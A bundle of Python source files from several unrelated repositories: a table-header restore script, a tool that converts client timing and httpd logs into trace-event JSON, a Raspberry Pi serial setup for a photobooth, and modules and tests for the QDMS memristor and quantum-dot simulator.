```python
__all__ = ['read_headers', 'parse_header_line', 'restore_header']
# Cell
#! python
import re
def read_headers(header_file):
"""Reads the header file which consists of lines starting with the table name followed by a : and the header.
It returns a dictionary of table names and their associated header lines.
"""
header_lines = {}
with open(header_file, 'r') as f:
for line in f:
table_name, header = parse_header_line(line.rstrip("\n"))
if table_name is not None:
header_lines[table_name] = header
return header_lines
def parse_header_line(line):
m = re.match('^([^:]+):', line)
if m:
table_name = m.group(1)
line = line[m.end():]
return table_name,line
return None,None
def restore_header(filename,output_filename,header,encoding ="latin-1"):
with open(filename, 'r',encoding=encoding) as f:
with open(output_filename, 'w',encoding=encoding) as out:
out.write(header+'\n')
for line in f:
line = line.rstrip('\n')
if line == header:
continue
out.write(line+'\n')
# Cell
try: from nbdev.imports import IN_NOTEBOOK
except: IN_NOTEBOOK=False
if __name__ == "__main__" and not IN_NOTEBOOK:
import argparse
import os
import sys
ap = argparse.ArgumentParser()
ap.add_argument("-n", "--header", required=True, help="headers file for restore")
ap.add_argument("-f", "--file", required=True,
help="file to be converted")
ap.add_argument("-o", "--output", required=False,default='',
help="output filename")
args = vars(ap.parse_args())
filename = args["file"]
headerfile = args["header"]
output_filename = args['output']
# Stip the suffex of the filename to get the table_name
base=os.path.basename(filename)
table_name = os.path.splitext(base)[0]
if output_filename == '':
output_filename = table_name + '.hdr'
headers = read_headers(headerfile)
if table_name in headers:
restore_header(filename,output_filename,headers[table_name])
else:
print(f"Skipping file:{filename} - no associated header found", file=sys.stderr)
``` |
{
"source": "3ideas/cronos",
"score": 2
} |
#### File: cronos/cronos/convert_time_log.py
```python
__all__ = ['trace_log', 'format_value', 'strip_extra_EnmacClientTime_elements', 'unix_time_milliseconds', 'parse_dt',
'parse_dt_to_milliseconds', 'parse_httpd_dt', 'parse_httpd_dt_to_milliseconds', 'match_last2digits',
'parse_timing_log', 'parse_log_line', 'parse_log_line_to_dict', 'parse_httpd_log', 'log_re', 'request_re',
'parse_httpd_log_file', 'parse_timing_log_file']
# Cell
import xml.etree.ElementTree as ET
import tempfile
import sys
import numbers
import decimal
class trace_log():
def __init__(self,fp_output):
self.outfile = fp_output
self.outfile.write('{ "traceEvents": \n')
self.outfile.write('[')
def write_element(self, event_type, name, categories, pid,tid, ts,additional_args=None,dur=None):
''' {"name": "Asub", "cat": "PERF", "ph": "B", "pid": 22630, "tid": 22630, "ts": 829}'''
line = '"name": "%s", "cat": %s, "ph": "%s", "pid": %s, "tid": %s, "ts": %s,' %(name,categories,event_type,pid,tid,ts)
if dur is not None:
line+= format_value('dur',dur) + ','
if additional_args is not None and len(additional_args) > 0:
line += format_value('args',additional_args) + ','
self.outfile.write('{'+line+'},\n')
def write_start_element(self, name, categories, pid,tid, ts,additional_args=None):
self.write_element('B',name,categories,pid,tid,ts,additional_args)
def write_end_element(self, name, categories, pid,tid, ts):
self.write_element('E',name,categories,pid,tid,ts)
def write_duration_event(self, name, categories, pid,tid, ts,dur, additional_args=None):
self.write_element('X',name,categories,pid,tid,ts,additional_args, dur)
def close(self):
self.outfile.write('],\n')
self.outfile.write(''' "displayTimeUnit": "ms",
"systemTraceEvents": "SystemTraceData",
"otherData": { "version": "PowerOn Client Trace"},
}
''')
self.outfile.close()
def format_value(name, value):
''' takes name and value and returns a string for the value element'''
formatted_string = ''
if name is not None:
formatted_string += '"%s": '%name
if isinstance(value, numbers.Number):
formatted_string += '%s'%value
elif isinstance(value, dict):
formatted_string += '{'
sep = ''
for key1,value1 in value.items():
formatted_string += sep + format_value(key1,value1)
sep = ','
formatted_string += '}'
elif isinstance(value, list):
formatted_string += '['
sep = ''
for item in value:
formatted_string += sep + format_value(None,item)
sep = ','
formatted_string += ']'
else:
formatted_string += '"%s"' %value
return formatted_string
# Cell
def strip_extra_EnmacClientTime_elements(filename,fp):
''' since we may have multiple EnmacClientTiming tags in the document we need to strip them out and add one at the end'''
fp.write("<EnmacClientTiming>\n")
if sys.version_info[0] < 3:
file = open(filename, 'r')
else:
file = open(filename, 'r', encoding='utf8')
if file is None:
print('Error opening file: %s' %filename)
return
for line in file:
l = line.rstrip()
if l == '<EnmacClientTiming>' or l == '</EnmacClientTiming>':
continue
fp.write(line)
fp.write("</EnmacClientTiming>\n")
# Cell
import datetime
import re
if sys.version_info[0] < 3:
epoch = datetime.datetime(1970, 1, 1)
else:
epoch = datetime.datetime(1970, 1, 1, tzinfo=datetime.timezone.utc)
match_last2digits = re.compile(r"(\d\d)$", re.IGNORECASE)
#epoch = datetime.datetime.fromtimestamp(0,datetime.timezone.utc) #
def unix_time_milliseconds(dt):
return (dt - epoch).total_seconds() * 1000.0
def parse_dt(time_str):
''' Parse string in format 2021-12-07T08:51:46.479299+00:00
return datetime'''
if sys.version_info[0] < 3:
time_str = time_str[:-6]
return datetime.datetime.strptime(time_str, '%Y-%m-%dT%H:%M:%S.%f')
else:
return datetime.datetime.strptime(time_str, '%Y-%m-%dT%H:%M:%S.%f%z').replace(tzinfo=datetime.timezone.utc)
return datetime.datetime.strptime(time_str, "%Y-%m-%dT%H:%M:%S.%f%z")
def parse_dt_to_milliseconds(time_str):
return unix_time_milliseconds(parse_dt(time_str))
def parse_httpd_dt(time_str):
''' parse a date time string which is in the format
25/Sep/2002:14:04:19 +0200
'''
if sys.version_info[0] < 3:
time_str = time_str[:-6]
return datetime.datetime.strptime(time_str, '%d/%b/%Y:%H:%M:%S')
else:
time_str =match_last2digits.sub(":\\1", time_str)
return datetime.datetime.strptime(time_str, '%d/%b/%Y:%H:%M:%S %z').replace(tzinfo=datetime.timezone.utc)
def parse_httpd_dt_to_milliseconds(time_str):
''' parse a datetime in the format:
03/Dec/2021:09:36:46 +0200'''
return unix_time_milliseconds(parse_httpd_dt(time_str))
# Cell
class parse_timing_log():
def __init__(self, fp_input, fp_output):
self.parse_functions = {
'Timing' : self.skip_element,
'Parameters' : self.skip_element,
'DataTables' : self.skip_element,
'HttpWebRequest' : self.parse_HttpWebRequest,
'CreateDataSet' : self.parse_CreateDataSet,
'FormAction' : self.parse_FormAction,
}
self.fp = fp_input
self.fp_output = fp_output
#self.elements = []
#self.path_list = []
self.level = 0
self.t = trace_log(fp_output)
self.parse2()
def skip_element(self, elment):
return 0
def parse_datatables_element(self, elem):
''' Parse element datatables which looks like:
<DataTables name="AvailableResources" tables="5" error="false">
<DataTable name="AVAILABLERESOURCES" rows="7"/>
<DataTable name="CONTACTDETAILS" rows="7"/>
<DataTable name="RESOURCEZONES" rows="0"/>
<DataTable name="ASSIGNED_INCIDENTS" rows="0"/>
<DataTable name="RESOURCE_OZ_ASSOCIATIONS" rows="2"/>
</DataTables>
return a list of date tables as arguments...'''
datatables = { 'name': elem.attrib['name'], 'number_of_tables': elem.attrib['tables'], 'error': elem.attrib['error'] }
tables = []
for child in elem:
tables.append({ 'name':child.attrib['name'], 'rows':child.attrib['rows'] })
datatables['tables'] = tables
return datatables
def parse_parameter_element(self, element):
''' Parse element parameter which looks like:
<Parameters postSize="105">
<Parameter name="searchlon" value="28.020557"/>
<Parameter name="positionupdatewithinmins" value="30"/>
<Parameter name="radiusinmiles" value="False"/>
<Parameter name="searchradius" value="10"/>
<Parameter name="searchlat" value="-26.033414"/>
</Parameters>
returns a list of parameters as arguments...'''
parameters = {'postSize': element.attrib['postSize']}
params = {}
for child in element:
params[child.attrib['name']] = child.attrib['value']
#params.append({'name': child.attrib['name'], 'value': child.attrib['value']})
parameters['params'] = params
return parameters
def get_end_time(self, element):
''' gets the timing element in element and returns the ms'''
timing = element.find('Timing')
if timing is None:
print('no timing element found')
return None
ts = timing.attrib["end"]
ms = parse_dt_to_milliseconds(ts)
if timing.attrib["thread"] != element.attrib["thread"]:
print('missmatched timing threads ??')
return ms
def parse_HttpWebRequest(self,elem):
''' Parse element HttpWebRequest which looks like:
<HttpWebRequest start="2021-12-07T17:46:43.910299+00:00" client="hydrogen-w11" thread="282" method="POST" uri="https://trn1nms/enmac/resources/available" status="OK" serverElapsed="0.33" serverCPU="0.0257">
<Parameters postSize="105">
<Parameter name="searchlon" value="28.020557"/>
<Parameter name="positionupdatewithinmins" value="30"/>
<Parameter name="radiusinmiles" value="False"/>
<Parameter name="searchradius" value="10"/>
<Parameter name="searchlat" value="-26.033414"/>
</Parameters>
<Timing thread="282" end="2021-12-07T17:46:45.688867+00:00" elapsed="1.78"/>
</HttpWebRequest>
'''
name = elem.attrib["uri"]
categories = '"HttpWebRequest"'
pid = 1
tid = elem.attrib["thread"]
ts = elem.attrib["start"]
ms = parse_dt_to_milliseconds(ts)
parameters = elem.find('Parameters')
p = self.parse_parameter_element(parameters)
additional_args = {
'parameters': p,
'start':ts,
'client':elem.attrib["client"],
'method':elem.attrib["method"],
'status':elem.attrib["status"],
'serverElapsed': float(elem.attrib["serverElapsed"]),
'serverCPU': float(elem.attrib["serverCPU"]) }
self.t.write_start_element(name,categories ,pid,tid,ms,additional_args)
self.parse_elements(elem)
ms = self.get_end_time(elem)
self.t.write_end_element(name,categories ,pid,tid,ms)
return 0
def parse_CreateDataSet(self,elem):
'''
Parse element CreateDataSet which looks like:
<CreateDataSet start="2021-12-07T17:50:36.520401+00:00" client="hydrogen-w11" thread="273" path="/enmac/swex/outages">
....
<DataTables name="AvailableResources" tables="5" error="false">
<DataTable name="AVAILABLERESOURCES" rows="7"/>
<DataTable name="CONTACTDETAILS" rows="7"/>
<DataTable name="RESOURCEZONES" rows="0"/>
<DataTable name="ASSIGNED_INCIDENTS" rows="0"/>
<DataTable name="RESOURCE_OZ_ASSOCIATIONS" rows="2"/>
</DataTables>
<Timing thread="282" end="2021-12-07T17:46:45.688867+00:00" elapsed="1.78"/>
</CreateDataSet>
'''
name = elem.attrib["path"]
categories = '"CreateDataSet"'
pid = 1
tid = elem.attrib["thread"]
ts = elem.attrib["start"]
ms = parse_dt_to_milliseconds(ts)
datatables = elem.find('DataTables')
dt = self.parse_datatables_element(datatables)
additional_args = {
'datatables': dt,
'start':ts,
'client':elem.attrib["client"]}
self.t.write_start_element(name,categories ,pid,tid,ms,additional_args)
self.parse_elements(elem)
ms = self.get_end_time(elem)
self.t.write_end_element(name,categories ,pid,tid,ms)
return 0
def parse_FormAction(self,elem):
'''
<FormAction start="2021-12-07T17:46:23.903476+00:00" client="hydrogen-w11" thread="18"
form="MainForm" action="SendNetServerMessage('MD_SET_PIPE_MESSAGE_FILTER', '135')">>
'''
name = elem.attrib["action"]
form = elem.attrib["form"]
categories = '"FormAction,%s"'%form
pid = 1
tid = elem.attrib["thread"]
ts = elem.attrib["start"]
ms = parse_dt_to_milliseconds(ts)
additional_args = {
'start':ts,
'client':elem.attrib["client"],
'form': form}
self.t.write_start_element(name,categories ,pid,tid,ms,additional_args)
self.parse_elements(elem)
ms = self.get_end_time(elem)
self.t.write_end_element(name,categories ,pid,tid,ms)
return 0
def parse_elements(self, elem):
for child in elem:
func= self.parse_functions.get(child.tag,lambda :-1)
if func(child) <0:
print('Unknown tag: elem.tag')
def parse2(self):
tree = ET.parse(self.fp)
root = tree.getroot()
self.parse_elements(root)
self.t.close()
# Cell
# [03/Dec/2021:09:36:46 +0200] 172.17.106.244 "devwks2" "POST /enmac/login/hostDetails HTTP/1.1" 200 652 pid:1980400 time:12680 +
# [03/Dec/2021:09:36:47 +0200] 172.17.106.244 "-" "GET /enmac/packages/restrict_new_clients HTTP/1.1" 404 196 pid:1980400 time:317 +
# [03/Dec/2021:10:04:56 +0200] 172.17.106.244 "devwks2" "POST /enmac/login/hostDetails HTTP/1.1" 200 655 pid:2020510 time:9657 +
# [03/Dec/2021:10:04:56 +0200] 172.17.106.244 "-" "GET /enmac/packages/restrict_new_clients HTTP/1.1" 404 196 pid:2020510 time:243 +
# [03/Dec/2021:15:19:04 +0200] 172.17.106.244 "devwks2" "POST /enmac/login/hostDetails HTTP/1.1" 200 655 pid:2047496 time:11086 +
# [03/Dec/2021:15:19:04 +0200] 172.17.106.244 "-" "GET /enmac/packages/restrict_new_clients HTTP/1.1" 404 196 pid:2047496 time:278 +
# [03/Dec/2021:16:00:04 +0200] 172.17.106.244 "devwks2" "POST /enmac/login/hostDetails HTTP/1.1" 200 655 pid:2020512 time:9956 +
# [03/Dec/2021:16:00:04 +0200] 172.17.106.244 "-" "GET /enmac/packages/restrict_new_clients HTTP/1.1" 404 196 pid:2020512 time:238 +
# [03/Dec/2021:17:57:48 +0200] 172.31.243.25 "hydrogen-w11" "POST /enmac/login/hostDetails HTTP/1.1" 200 655 pid:2020514 time:209610 +
#log_re = re.compile('\[(.*?)\] ([(\d\.)]+) "(.*?)" "(.*?)" (\d+) (\d+) pid:(\d+) time:(\d+) ([+-]+)')
log_re = re.compile('\[(.*?)\] ([(\d\.)]+) "(.*?)" "(.*?)" (\d+) (\d+) pid:(\d+) time:(\d+) ([+-]+)')
def parse_log_line(line):
''' parse an apache httpd log line. Given the line, return the date, ip,request, response_code,length'''
matches = log_re.match(line).groups()
return matches
request_re = re.compile('^(.*?) (.*?) (.*?$)')
def parse_log_line_to_dict(line):
#print(line)
#continue
l = {}
matches = parse_log_line(line)
#matches = log_re.match(line).groups()
dt_str = matches[0]
l['dt_str'] = dt_str
l['ts'] = parse_httpd_dt_to_milliseconds(dt_str)
l['ip_addr'] = matches[1]
l['client_name'] = matches[2]
request = matches[3]
l['response_code'] = matches[4]
l['response_length'] = int(matches[5])
l['pid'] = matches[6]
duration_microseconds = int(matches[7])
l['duration_milliseconds'] = duration_microseconds / 1000.0
req_match = request_re.match(request).groups()
l['method'] = req_match[0]
l['name'] = req_match[1]
l['protocol'] = req_match[2]
#print(f'{dt_str} {ip_addr} {request} {response_code} {response_length} {pid} {duration}' )
return l
class parse_httpd_log():
def __init__(self, fp_input,fp_output):
self.fp_input = fp_input
self.fp_output = fp_output
self.t = trace_log(fp_output)
self.process_log()
def process_log(self):
for line in self.fp_input:
l = parse_log_line_to_dict(line)
categories='"httpd"'
additional_args = {
'start':l['dt_str'],
'client':l['ip_addr'],
'client_name':l['client_name'],
'resp_code': l['response_code'],
'resp_len': l['response_length']}
self.t.write_duration_event(l['name'], categories, 1,l['pid'], l['ts'],l['duration_milliseconds'], additional_args)
self.t.close()
# Cell
def parse_httpd_log_file(input_filename,output_filename,stdout):
''' pase the httpd acces log `input_filename` ,
if `stdout` is set output is send to stdout,
else if 'output_filename is not set output is saved to `inputfilename` with end changed to json
otherwise outpuut is saved to `output_filename`'''
fp = open(input_filename)
if stdout:
fo = sys.stdout
elif output_filename == '':
outfilename = os.path.splitext(input_filename)[0] + '.json'
fo = open(outfilename,'w')
else:
outfilename = output_filename
fo = open(outfilename,'w')
parse_httpd_log(fp,fo)
def parse_timing_log_file(input_filename, output_filename, preprocess, stdout ):
''' parse the `input_filename`, if the `preprocess` flag is set then it runs the preprocess
which strips out extra xml tags (and makes it a lot slower since it creates a tmp file,
if stdout is set then output is streamed there
if `output_filename` is empty then it outputs to same name as input but with end changed to json'''
tmp_file = ''
if preprocess :
tmp_file = '/tmp/cronos_' + str(random.randint(1, 1000000)) + '.tmp'
fp = open(tmp_file, 'w+')
strip_extra_EnmacClientTime_elements(input_filename,fp)
fp.close()
fp = open(tmp_file, 'r')
else:
fp = open(input_filename)
if stdout:
fo = sys.stdout
elif output_filename == '':
outfilename = os.path.splitext(input_filename)[0] + '.json'
fo = open(outfilename,'w')
else:
outfilename = output_filename
fo = open(outfilename,'w')
parse_timing_log(fp,fo)
fo.close()
fp.close()
if tmp_file != '':
os.remove(tmp_file)
# Cell
try: from nbdev.imports import IN_NOTEBOOK
except: IN_NOTEBOOK=False
if __name__ == "__main__" and not IN_NOTEBOOK:
import argparse
import os
import sys
import random
ap = argparse.ArgumentParser(description='''Parse ADMS Client Timing Log into event time format, The output file can be viewed in https://ui.perfetto.dev/.
Source and doc for this utility can be found at https://github.com/3ideas/cronos
Copyright 3ideas Solutions Ltd ''')
ap.add_argument('-p', '--nopreprocess', required=False,
help="don't preprocess the file to strip out extra EnmacClientTiming tags in the file", default=True, action='store_false')
ap.add_argument("-f", "--file", required=False, help="client timing log file to parse to generate timing log file from ", default='')
ap.add_argument("-a", "--httpd_logfile", required=False, help="httpd_logfile to parse to generate timing log file from ", default='')
ap.add_argument("-o", "--output", required=False, help="output file name",default = '')
ap.add_argument("-s","--stdout", required=False, help="print to stdout",default = False, action='store_true')
args = vars(ap.parse_args())
if args['file'] != '':
parse_timing_log_file(args['file'],args['output'],args['nopreprocess'],args['stdout'] )
if args['httpd_logfile'] != '':
parse_httpd_log_file(args['httpd_logfile'],args['output'],args['stdout'])
``` |
{
"source": "3isenHeiM/Photob00th",
"score": 3
} |
#### File: raspi/photobooth/photobooth_serial.py
```python
import os
import sys
import time
import signal
import traceback
import logging
from logging import handlers
import serial
import threading
def initSerial(arduino):
try:
# Configure serial communication RaspberryPi-Arduino
arduino = serial.Serial(
#port='/dev/ttyUSB1',
port='/dev/ttyACM0',
baudrate=115200,
parity=serial.PARITY_ODD,
stopbits=serial.STOPBITS_TWO,
bytesize=serial.SEVENBITS
)
# Try to open port
arduino.open()
if arduino.isOpen() : # Returns true if serial port is opened
logging.info("Serial communication opened to: %s" %arduino.portstr)
else :
raise IOError
except IOError: # if port is already opened, close it and open it again and print message
logging.critical("IOError recieved, trying to open the port in 2s")
arduino.close()
time.sleep(2)
arduino.open()
logging.warning("Port was already open, was closed and opened again.")
return arduino
``` |
{
"source": "3it-nano/QDMS",
"score": 2
} |
#### File: deprecated/tests/test_Log.py
```python
import shutil
import qdms
import numpy as np
def setup_save_load():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor_model=memristor, number_of_memristor=4, is_new_architecture=True, v_in=1e-3,
gain_resistance=0, R_L=1)
pulsed_programming = qdms.PulsedProgramming(circuit, 4, tolerance=1, is_relative_tolerance=True)
pulsed_programming.simulate()
memristor_sim = qdms.MemristorSimulation(pulsed_programming, verbose=False)
memristor_sim.simulate()
# memristor_result = qdms.HelperFunction.limit_vector(memristor_sim.voltages, 0.175, 0.210)
memristor_result = qdms.HelperFunction.simplify_vector_resolution(memristor_sim.voltages, 0.0001)
quantum_sim = qdms.QDSimulation(memristor_result, verbose=False)
quantum_sim.simulate()
return memristor, circuit, pulsed_programming, memristor_sim, quantum_sim
def compare_everything(setup, load):
if compare_memristor(setup[0], load[0]):
if compare_circuit(setup[1], load[1]):
if compare_pulsed_programming(setup[2], load[2]):
if compare_memristor_sim(setup[3], load[3]):
if compare_quantum_sim(setup[4], load[4]):
return True
return False
def compare_memristor(setup, load):
if type(setup) != type(load): return False
if setup.time_series_resolution != load.time_series_resolution: return False
if setup.r_off != load.r_off: return False
if setup.r_on != load.r_on: return False
if setup.A_p != load.A_p: return False
if setup.A_n != load.A_n: return False
if setup.t_p != load.t_p: return False
if setup.t_n != load.t_n: return False
if setup.k_p != load.k_p: return False
if setup.k_n != load.k_n: return False
if setup.r_p != load.r_p: return False
if setup.r_n != load.r_n: return False
if setup.eta != load.eta: return False
if setup.a_p != load.a_p: return False
if setup.a_n != load.a_n: return False
if setup.b_p != load.b_p: return False
if setup.b_n != load.b_n: return False
if setup.g != load.g: return False
return True
def compare_circuit(setup, load):
if setup.number_of_memristor != load.number_of_memristor: return False
if setup.gain_resistance != load.gain_resistance: return False
if setup.v_in != load.v_in: return False
if setup.R_L != load.R_L: return False
if setup.is_new_architecture != load.is_new_architecture: return False
return True
def compare_pulsed_programming(setup, load):
if setup.nb_states != load.nb_states: return False
if setup.distribution_type != load.distribution_type: return False
if setup.pulse_algorithm != load.pulse_algorithm: return False
if setup.lrs != load.lrs: return False
if setup.hrs != load.hrs: return False
if setup.res_states != load.res_states: return False
if setup.res_states_practical != load.res_states_practical: return False
if setup.max_voltage != load.max_voltage: return False
if setup.tolerance != load.tolerance: return False
if setup.index_variability != load.index_variability: return False
if setup.variance_read != load.variance_read: return False
if setup.variance_write != load.variance_write: return False
if np.all(setup.variability_read != load.variability_read): return False
if np.all(setup.variability_write != load.variability_write): return False
if setup.number_of_reading != load.number_of_reading: return False
if setup.graph_resistance != load.graph_resistance: return False
if setup.graph_voltages != load.graph_voltages: return False
if setup.max_pulse != load.max_pulse: return False
if setup.is_relative_tolerance != load.is_relative_tolerance: return False
return True
def compare_memristor_sim(setup, load):
if setup.is_using_conductance != load.is_using_conductance: return False
if setup.voltages != load.voltages: return False
if setup.resistances != load.resistances: return False
if setup.verbose != load.verbose: return False
if setup.list_resistance != load.list_resistance: return False
if setup.timers != load.timers: return False
if setup.resolution != load.resolution: return False
if setup.std != load.std: return False
return True
def compare_quantum_sim(setup, load):
if np.all(setup.stability_diagram != load.stability_diagram): return False
if np.all(setup.voltages != load.voltages): return False
if setup.Cg1 != load.Cg1: return False
if setup.Cg2 != load.Cg2: return False
if setup.CL != load.CL: return False
if setup.CR != load.CR: return False
if setup.parameter_model != load.parameter_model: return False
if setup.T != load.T: return False
if setup.Cm != load.Cm: return False
if setup.kB != load.kB: return False
if setup.N_min != load.N_min: return False
if setup.N_max != load.N_max: return False
if setup.n_dots != load.n_dots: return False
if setup.verbose != load.verbose: return False
return True
def test_save_load_everything_hdf5():
memristor, circuit, pulsed_programming, memristor_sim, quantum_sim = setup_save_load()
qdms.Log.save_everything_hdf5(path='.//Simulation', directory_name='test_save_load_everything_hdf5', memristor=memristor,
pulsed_programming=pulsed_programming, circuit=circuit, memristor_sim=memristor_sim,
qd_simulation=quantum_sim, verbose=False)
memristor_load, circuit_load, pulsed_programming_load, memristor_sim_load, quantum_sim_load = qdms.Log.load_everything_hdf5(
path='.//Simulation//test_save_load_everything_hdf5')
result = compare_everything([memristor, circuit, pulsed_programming, memristor_sim, quantum_sim], [memristor_load, circuit_load, pulsed_programming_load, memristor_sim_load, quantum_sim_load])
shutil.rmtree('.//Simulation//test_save_load_everything_hdf5')
assert result
```
#### File: deprecated/tests/test_MemristorSimulation.py
```python
import qdms
def test_simulate():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor, 4)
pulsed_programming = qdms.PulsedProgramming(circuit, 6, tolerance=1)
pulsed_programming.simulate()
memristor_sim = qdms.MemristorSimulation(pulsed_programming)
memristor_sim.simulate()
memristor_sim_load = qdms.Log.load_memristor_simulation_hdf5('./tests/TestData/memristor_sim_data.hdf5', pulsed_programming)
assert memristor_sim_load.voltages == memristor_sim.voltages
```
#### File: deprecated/tests/test_PulsedProgramming.py
```python
import qdms
import numpy as np
def test_read_resistance_without_variability():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor, 1)
pulsed_programming = qdms.PulsedProgramming(circuit, 2)
value = pulsed_programming.read_resistance(pulsed_programming.circuit.memristor_model)
assert round(value) == round(pulsed_programming.circuit.memristor_model.r_on)
def test_read_resistance_with_variability():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor, 1)
pulsed_programming = qdms.PulsedProgramming(circuit, 2, variance_read=1/300)
result = []
for _ in range(1000):
value = pulsed_programming.read_resistance(pulsed_programming.circuit.memristor_model)
max = pulsed_programming.circuit.memristor_model.r_on + 0.015 * pulsed_programming.circuit.memristor_model.r_on
min = pulsed_programming.circuit.memristor_model.r_on - 0.015 * pulsed_programming.circuit.memristor_model.r_on
if min < value < max:
result.append(True)
else:
result.append(False)
assert np.all(result)
def test_write_resistance_without_variability():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor, 1)
pulsed_programming = qdms.PulsedProgramming(circuit, 2)
pulsed_programming.write_resistance(pulsed_programming.circuit.memristor_model, -2, 200e-9)
value = pulsed_programming.read_resistance(pulsed_programming.circuit.memristor_model)
assert value > pulsed_programming.circuit.memristor_model.r_on
def test_write_resistance_with_variability():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor, 1)
pulsed_programming = qdms.PulsedProgramming(circuit, 2, variance_write=1/300)
result_max = []
result_min = []
pulsed_programming.circuit.memristor_model.g = 1/2000
for _ in range(1000):
previous = pulsed_programming.read_resistance(pulsed_programming.circuit.memristor_model)
pulsed_programming.write_resistance(pulsed_programming.circuit.memristor_model, 0, 200e-9)
next = pulsed_programming.read_resistance(pulsed_programming.circuit.memristor_model)
result_max.append((next - previous) / 2000 * 100 <= 1.2)
result_min.append((next - previous) / 2000 * 100 >= 0.9)
assert np.all(result_max) and np.any(result_min)
def test_distribution():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor, 9)
pulsed_programming_linear = qdms.PulsedProgramming(circuit, 2, distribution_type='linear')
pulsed_programming_half_spread = qdms.PulsedProgramming(circuit, 2, distribution_type='half_spread')
pulsed_programming_full_spread = qdms.PulsedProgramming(circuit, 2, distribution_type='full_spread')
result = False
if len(pulsed_programming_linear.res_states) == 1:
if len(pulsed_programming_half_spread.res_states) == 3:
if len(pulsed_programming_full_spread.res_states) == 9:
result = True
assert result
def test_log_convergence():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor, 1)
pulsed_programming = qdms.PulsedProgramming(circuit, 2, hrs=3000, tolerance=1, is_relative_tolerance=True,
pulse_algorithm='log')
pulsed_programming.simulate()
assert not len(pulsed_programming.graph_resistance) -1 == pulsed_programming.max_pulse
def test_fabien_convergence():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor, 1)
pulsed_programming = qdms.PulsedProgramming(circuit, 2, hrs=3000, tolerance=1, is_relative_tolerance=True,
pulse_algorithm='fabien')
pulsed_programming.simulate()
assert not len(pulsed_programming.graph_resistance) - 1 == pulsed_programming.max_pulse
```
#### File: QDMS/qdms/Circuit.py
```python
from .Memristor import Memristor
import copy
class Circuit:
"""
This class contains all the parameters for the circuit and the voltages calculation.
Parameters
----------
number_of_memristor : int
The number of memristor that contain in the circuit.
memristor_model : MemristorModel.Memristor.Memristor
The memristor object which needs to inherit from Memristor class in MemristorModel.Memristor.
gain_resistance : float
Represents the gain of the circuit.
v_in : float
v_in is the voltage at the start of the circuit. (V)
R_L : float
Represents the resistance load (Ohm) of the wires.
is_new_architecture : bool
The simulator accept two types of architecture. If false, the old architecture is used, which is based on a
voltage divider. The new architecture moves the memristor in the feedback loop of an op-amp.
"""
def __init__(self, memristor_model, number_of_memristor, gain_resistance=0, v_in=1e-3, R_L=1,
is_new_architecture=True):
if not isinstance(memristor_model, Memristor):
print(f'Error: memristor object <{memristor_model}> doesn\'t inherited from Memristor ABC')
exit(1)
self.memristor_model = memristor_model
self.number_of_memristor = number_of_memristor
self.gain_resistance = gain_resistance
self.v_in = v_in
self.R_L = R_L
self.is_new_architecture = is_new_architecture
self.list_memristor = []
for _ in range(number_of_memristor):
self.list_memristor.append(copy.deepcopy(memristor_model))
def print(self):
print(self.memristor_model)
print(self.number_of_memristor)
print(self.gain_resistance)
print(self.v_in)
print(self.R_L)
print(self.is_new_architecture)
print(self.list_memristor)
def calculate_voltage(self, conductance):
"""
This function calculate the voltage depending on the conductance of the memristors.
Parameters
----------
conductance : float
Conductance of the memristors (S).
Returns
----------
voltage : float
The voltage of the circuit for this conductance.
"""
if self.is_new_architecture:
voltage = (1/conductance) * (self.v_in / self.R_L)
else:
voltage = conductance * self.gain_resistance * self.v_in
return voltage
def current_conductance(self):
"""
This function return the current conductance of the circuit.
"""
g = 0
for res in self.list_memristor:
g += 1 / res.read()
return g
def current_v_out(self):
"""
This function return the current voltage output of the circuit.
"""
return self.calculate_voltage(self.current_conductance())
```
#### File: QDMS/qdms/Log.py
```python
import bz2
import pickle
import _pickle as cPickle
import os
import time
# Pickle a file and then compress it into a file with extension
def compressed_pickle(title, data):
with bz2.BZ2File(title + '.pbz2', 'w') as f:
cPickle.dump(data, f)
# Load any compressed pickle file
def decompress_pickle(file):
data = bz2.BZ2File(file, 'rb')
data = cPickle.load(data)
return data
def save_everything_pickle(path, memristor_sim=None, qd_simulation=None, pulsed_programming=None, circuit=None, memristor=None, algorithm=None, verbose=False):
"""
This function save all the parameters in a folder name SaveData.
Parameters
----------
memristor_sim : MemristorSimulation.MemristorSimulation
The memristor simulation
qd_simulation : QDSimulation
The quantum dot simulation
pulsed_programming : PulsedProgramming.PulsedProgramming
The pulsed programming
circuit : Circuit.Circuit
Circuit
memristor : MemristorModel.Memristor.Memristor
memristor
path : string
Where the the directory_name will be.
verbose : bool
Output in console the timers..
Returns
----------
"""
if not os.path.isdir(f'{path}'):
os.mkdir(f'{path}')
if memristor is not None:
if verbose:
print('\n##########################\n'
'Start saving')
start = time.time()
compressed_pickle(f'{path}\\memristor', memristor)
if verbose:
print(f'Memristor: {time.time()-start}')
start = time.time()
if circuit is not None:
compressed_pickle(f'{path}\\circuit', circuit)
if verbose:
print(f'Circuit: {time.time()-start}')
start = time.time()
if pulsed_programming is not None:
compressed_pickle(f'{path}\\pulsed_programming', pulsed_programming)
if verbose:
print(f'Pulsed programming: {time.time()-start}')
start = time.time()
if memristor_sim is not None:
compressed_pickle(f'{path}\\memristor_sim', memristor_sim)
if verbose:
print(f'Memristor simulation: {time.time()-start}')
start = time.time()
if qd_simulation is not None:
compressed_pickle(f'{path}\\qd_simulation', qd_simulation)
if verbose:
print(f'QD simulation: {time.time()-start}')
start = time.time()
if algorithm is not None:
compressed_pickle(f'{path}\\algorithm', algorithm)
if verbose:
print(f'QD simulation: {time.time()-start}')
def load_everything_pickle(path, verbose=False):
"""
This function load a full simulation from a directory path, considering the orignal name created by save_everything_pickle().
Parameters
----------
path : string
The directory path from where the data is.
verbose : bool
Output in console the timers.
Returns
----------
memristor : MemristorModel.Memristor.Memristor
memristor.
circuit : Circuit.Circuit
Circuit.
memristor_sim : MemristorSimulation.MemristorSimulation
The memristor simulation.
pulsed_programming : PulsedProgramming.PulsedProgramming
The pulsed programming.
qd_simulation : QDSimulation
The quantum dot simulation.
"""
if verbose:
print('\n##########################\n'
'Start loading')
start = time.time()
